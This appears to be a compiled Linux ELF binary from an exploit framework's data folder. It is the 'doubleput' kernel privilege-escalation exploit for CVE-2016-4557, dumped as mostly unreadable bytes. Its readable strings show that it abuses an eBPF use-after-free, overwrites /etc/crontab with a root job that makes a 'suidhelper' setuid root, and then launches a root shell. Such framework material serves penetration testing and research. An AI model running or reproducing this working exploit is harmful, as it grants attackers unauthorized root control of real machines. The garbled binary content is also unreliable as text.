metasploit-gs/data/exploits/CVE-2016-4557/doubleput

ELF

>
 
@@ .@8	@@@@@@ø
ø
88@8@

@@\\ 
``Èà ((`(`Ð
Ð
TT@T@DDPåtdÄÄ@Ä@LLQåtdRåtd``ð
ð

/lib64/ld-linux-x86-64.so.2
GNU GNU?Ž`Ž‰ÍLí¼bÑÕñÉ—›‡píp

9ò‹LE]r2>9™j€ž‘¸ °fx†q‹-cà `libc.so.6exitsprintfget_current_dir_nameforkgetpidmmapstrlenwritev__errno_locationclonestderrsystemfwritewaitpidcloseopensleepsyscallerrx__libc_start_main__xstat__gmon_start__GLIBC_2.2.5


ui	Çø`
à ` `
  `( `0 `8 `@ `H `P `X `	` `
h `p `x `€ `ˆ `� `˜ `  `¨ `° `¸ `À `HƒìH‹m H…Àtè{
HƒÄÃÿ5b ÿ%d @ÿ%b héàÿÿÿÿ%Z h
éÐÿÿÿÿ%R héÀÿÿÿÿ%J hé°ÿÿÿÿ%B hé ÿÿÿÿ%: hé�ÿÿÿÿ%2 hé€ÿÿÿÿ%* hépÿÿÿÿ%" hé`ÿÿÿÿ% h	éPÿÿÿÿ% h
é@ÿÿÿÿ%
 hé0ÿÿÿÿ% hé ÿÿÿÿ%ú h
éÿÿÿÿ%ò héÿÿÿÿ%ê héðþÿÿÿ%â héàþÿÿÿ%Ú héÐþÿÿÿ%Ò héÀþÿÿÿ%Ê hé°þÿÿÿ% hé þÿÿÿ%º hé�þÿÿÿ%â f�1íI‰Ñ^H‰âHƒäðPTIÇÀ€@HÇÁ@HÇÇK@èÿÿÿôfD¸ß `UH-Ø `HƒøH‰åv¸H…Àt]¿Ø `ÿàf„]Ã@f.„¾Ø `UH�îØ `HÁþH‰åH‰ðHÁè?H
ÆHÑþt¸H…Àt]¿Ø `ÿà]ÃfD€= uUH‰åènÿÿÿ]Æþ 
óÃ@¿ `Hƒ?u듸H…ÀtñUH‰åÿÐ]ézÿÿÿUH‰åH�ìPH‰½¸÷ÿÿdH‹%(H‰Eø1ÀèDþÿÿH‰…È÷ÿÿH‹�È÷ÿÿH‹•È÷ÿÿH�…ð÷ÿÿ¾¸@H‰Ç¸èVþÿÿH�…ð÷ÿÿH‰…à÷ÿÿH�…ð÷ÿÿH‰ÇèyýÿÿH‰…è÷ÿÿ¿@è˜ýÿÿ…Àt¾‚@¿
¸èpýÿÿ¾¿’@¸èìýÿÿ‰…Ä÷ÿÿƒ½Ä÷ÿÿÿu¾£@¿
¸è©ýÿÿH��à÷ÿÿ‹…Ä÷ÿÿºH‰Î‰ÇèÝüÿÿHƒøt¾º@¿
¸èýÿÿ‹…Ä÷ÿÿA¹A‰À¹
º
¾¿èËüÿÿH‰…Ð÷ÿÿHƒ½Ð÷ÿÿÿu¾Õ@¿
¸è&ýÿÿH‹o H‰Áº¾
¿ì@èXýÿÿ‹^ H‹�Ð÷ÿÿº
H‰Î‰ÇèüÿÿH‰…Ø÷ÿÿHƒ½Ø÷ÿÿÿu¾ý@¿
¸èÇüÿÿH�…ð÷ÿÿH‰Çè(üÿÿH‰ÂH‹…Ø÷ÿÿH9ÂtH‹…Ø÷ÿÿ‰Â¾@¿
¸èüÿÿH‹Õ H‰ÁºX¾
¿ @è¾üÿÿ¿
èÄüÿÿëôUH‰åAUATSH�ì^dH‹%(H‰EØ1À¾
¿y@¸èOüÿÿ‰… ‹ ƒøÿu¾ƒ@¿
¸è
üÿÿH�…°±ÿÿH N¹ºH‰Æ¿@¸è!ûÿÿ‰…Ü¡ÿÿƒ½Ü¡ÿÿÿu¾™@¿
¸è¾ûÿÿ¿èüÿÿÇ…Ô¡ÿÿéåHÇ…¢ÿÿHÇ…¢ÿÿÆ…¢ÿÿ¶…¢ÿÿƒàƒÈˆ…¢ÿÿ‹Ë ‰…¢ÿÿH�•à¡ÿÿ¸¹H‰×óH«Ç…à¡ÿÿ
Ç…ä¡ÿÿH�…¢ÿÿH‰…è¡ÿÿ¸Ÿ@H‰…ð¡ÿÿH�…à¡ÿÿ¹0H‰Â¾¿A
¸èÑúÿÿHƒøÿt¾ @¿
¸èwúÿÿèúÿÿ‹ƒøt¾Ð@¿
¸èÇúÿÿƒ…Ô¡ÿÿ
ƒ½Ô¡ÿÿ
ŽÿÿÿÇ…Ø¡ÿÿÆ…Ó¡ÿÿ
H��à¡ÿÿ‹…Ü¡ÿÿº
H‰Î‰Çè–úÿÿ;…Ü¡ÿÿu¾@¿
¸èúùÿÿ€½Ó¡ÿÿ„·¾¿>@¸èiúÿÿ‰Â‹…Ø¡ÿÿH˜‰”…¢ÿÿ‹…Ø¡ÿÿH˜‹„…¢ÿÿƒøÿu¾K@¿
¸èúÿÿ‹…Ø¡ÿÿH˜D‹¤…¢ÿÿ‹V èUùÿÿA‰ÅèMùÿÿE‰áA‰Ø¹D‰ê‰Æ¿8
¸èžùÿÿH…ÀtYƒ…Ø¡ÿÿ
�½Ø¡ÿÿè…ÿÿÿÆ…Ó¡ÿÿéÿÿÿƒ­Ø¡ÿÿ
‹…Ø¡ÿÿH˜‹„…¢ÿÿ‰Çè9ùÿÿƒ½Ø¡ÿÿ…ÚþÿÿÆ…Ó¡ÿÿ
éÎþÿÿ�H‹¸ H‰Áº¾
¿\@è¡ùÿÿ¿
è§ùÿÿëôUH‰åH�ì°dH‹%(H‰Eø1Àè–ùÿÿ‰…\ÿÿÿƒ½\ÿÿÿÿu¾w@¿
¸èùÿÿƒ½\ÿÿÿuè“üÿÿH�…`ÿÿÿH‰Æ¿|@èá…Àt¾‡@¿
¸èÉøÿÿ‹…xÿÿÿ%…Àu¿
èùÿÿë¹�H‹ö H‰Áº+¾
¿˜@èßøÿÿ¿èÅøÿÿDAWAVA‰ÿAUATL�%î UH�-î SI‰öI‰ÕL)åHƒìHÁýè?÷ÿÿH…ít 1Û„L‰êL‰öD‰ÿAÿÜHƒÃ
H9ëuêHƒÄ[]A\A]A^A_Ã�f.„óÃf.„@H‰òH‰þ¿
éÐ÷ÿÿHƒìHƒÄÃ
* * * * * root /bin/chown root:root '%s'/suidhelper; /bin/chmod 06755 '%s'/suidhelper
#fusermount -u /home/user/ebpf_mapfd_doubleput/fuse_mount 2>/dev/null; mkdir -p fuse_mount && ./hello ./fuse_mountsystem() failedfuse_mount/hellounable to open FUSE fdunable to write to FUSE fdunable to mmap FUSE fdstarting writev
writev failedwritev returned %dwritev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
/dev/nullunable to open UAF fdcloneexpected BPF_PROG_LOAD to fail, but it didn'texpected BPF_PROG_LOAD to fail with -EINVAL, got different errorchild quit before we got a good file*/etc/crontabopen target filewoohoo, got pointer reuse
forksuidhelperstat suidhelpersuid file detected, launching rootshell...

;HÜóÿÿ”\õÿÿdRöÿÿ¼jøÿÿ܇ûÿÿüLüÿÿ
¼üÿÿd
Ìüÿÿ|

zR
x
�
ðôÿÿ*
zR
x
�
$@óÿÿp
FJw€?;*3$"DŽõÿÿA†C
d†÷ÿÿA†C
L�Œƒ„ƒúÿÿÀA†C
D¤(ûÿÿeB�BŽE �B(ŒH0†H8ƒM@r8A0A(B BBBìPûÿÿ
Hûÿÿð
@Ð
@

€@
 @``õþÿo˜@@À@
Ó `p@@@0	þÿÿo @ÿÿÿo
ðÿÿoì@(`¶@Æ@Ö@æ@ö@	@	@&	@6	@F	@V	@f	@v	@†	@–	@¦	@¶	@Æ	@Ö	@æ	@ö	@
@GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.2) 5.4.0 20160609
8@T@t@˜@À@@ì@ @	@@
p@€@ @

@ 
@ @°@Ä@@`` `(`ø` `È `à `
ñÿ
 `P
@�
@.Ð